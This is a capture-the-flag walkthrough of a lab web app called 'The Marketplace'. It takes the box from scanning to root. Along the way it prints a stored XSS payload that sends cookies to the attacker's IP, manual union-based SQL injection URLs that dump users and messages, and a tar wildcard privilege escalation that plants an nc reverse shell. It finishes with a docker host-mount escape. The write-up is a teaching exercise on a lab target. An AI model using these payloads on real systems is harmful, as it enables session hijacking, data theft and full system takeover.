The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out.
So without wasting time let get in .
Level : Medium
- Dirb content discovery
- Web Pentesting
- Stealing cookies by XSS vulnerability
- Manual SQL injection
- Privilege Escalation
- wildcard exploitation
- sudo rights
- docker exploitation
We start our enumeration by putting Rustscan on duty to identify the running service on target machine and we got the result .
rustscan 10.10.82.83 --ulimit 5000 -- -A
So we start our war with port 80 and we get a home page for marketplace where we can signup and do the login and also list out the items available on the site . So we make a account and login with it .
After Signup and then login we get few options Where we can create new list and upload options is also there but that is disable but with the help of inspect element we make a upload but we didn’t get any success .
Now after closing one door we start digging more and we figure out that we can do some XSS of course reflected one and we pop the hey in the air .
Now after searching on internet that what are the different attacking strategy , we discover that we can steal the cookies of different user with the help of java script , so we found the treasure .After reading about we figured out our attack . Here this XSS reflected is converted into store .
So we started or netcat so that any request make to us we can get the value of headers and we put the XSS payload again .
<script>var i=new Image;i.src="http://10.11.3.131:8888/?"+document.cookie;</script>
But this is our own cookie but we want admin so that we can hijack the session so after submit the query on site we see that we can report to the admin about the listing items and if admin visit to our reported item in which we already insert our payload then we get the cookies of admin .
After reporting we get a message and we start waiting and keep our eye on netcat is any request come ad after some sec we get new cookie and this time we start out second phase of attack i.e is start hijacking . After putting the cookie value in the inspect element we refresh the page and we get the admin access .
Here we are in admin account we start more digging like any users , password reset , email or anything else . We get some users which we written in our note so that later we can use them if they need .
At this place while we are suffering on different profiles we see that URL is fetching data according the “id” value and this make my mind think that can we try some SQL injection here . So we start doing fuzzing and with simple breaker we get our favorite message on screen , you guys already know it what it was .
Now we are going to start our manual approach you can go with automate tool also sqlmap but go with manual .
- So first find out the columns .
- Identify the Leak parameter .
- Then dump out the some information like database name or version .
- Dump out the tables from database .
- Dump out the columns
- At last dump out the content
So let go into the sea …
SO first identify the number of columns we have access . So here we put the value of 5 which say that column not there it means there are less then 5 columns which you will figure out .
http://10.10.82.83/admin?user=0 order by 1,2,3,4,5
After getting the number of columns i.e is 4 we are trying to dump some information like database name or version .
http://10.10.82.83/admin?user=0 union select 1,2,3,4
http://10.10.82.83/admin?user=0 union select version(),database(),3,4
After getting the database name we are trying to dump out the table name
http://10.10.82.83/admin?user=0 union select table_name,database(),3,4 from information_schema.tables where table_schema='marketplace'
Here we get the table name but only single name reflect , so solving this we are using concat which help us to bring out the all string in one form .
http://10.10.82.83/admin?user=0 union select group_concat(table_name),database(),3,4 from information_schema.tables where table_schema='marketplace'
Here we get the 3 tables i.e items , messages , users . As we see users table we are going to touch this , sometime we get some hash value which we can use in further attacks .So let go for the columns of users table .
http://10.10.82.83/admin?user=0 union select group_concat(column_name),database(),3,4 from information_schema.columns where table_name='users'
Here we get 4 columns which are id parameter , username , password , a boolean parameter i.e isAdministrator . Now going to dump out the content of password and id so let go back to terminal .
http://10.10.82.83/admin?user=0 union select group_concat(password),database(),3,4 from users
Now here i stuck because hash are taking too much time so i started some more digging on some other tables data like messages table .
http://10.10.82.83/admin?user=0 union select group_concat(column_name),database(),3,4 from information_schema.columns where table_name='messages'
Here we get 5 columns “id,user_from,user_to,message_content,is_read” now after that let dump out the messages from database may be chances are there we get something good.
http://10.10.82.83/admin?user=0 union select group_concat(id,message_content),database(),3,4 from messages
And here we get the password of the user which we can use to ssh into the user directly and we already know the user as we already see in the admin panel .
So without taking too much time let do ssh
we are finally in the server now its time to get the root power so let start our enumeration path and with in a sec we see that “michael” can run the script without using the password and by reading the script we see that we can perform the wild card privilege escalation on it .
So we start digging again on internet that how this going to be done because gtfobin is dead end and after some digging we found the resources to understand the wildcard privilege escalation .
cd /opt/backups/ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.131 1234 >/tmp/f" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 chmod 777 backup.tar shell.sh sudo -u michael /opt/backups/backup.sh
Here we put our netcat reverse shell in the bash file and we make a checkpoint , we also started our netcat session before firing the backup.sh
And we successfully get onto the michael and its time to perform another privilege escalation . if you see above , michael is the member of docker group and as you know that docker service can only run by the root power and we can exploit this by mounting the file system of our main host machine to container of the docker images and then we can access it easily . you can get the document to understand it .
python -c "import pty;pty.spawn('/bin/bash')" docker run -v /:/mnt --rm -it apline chroot /mnt sh
And Finally we get our root flag .
Hopefully you like the writeup for any query you can contact to us [email protected] or you can dm us on twitter .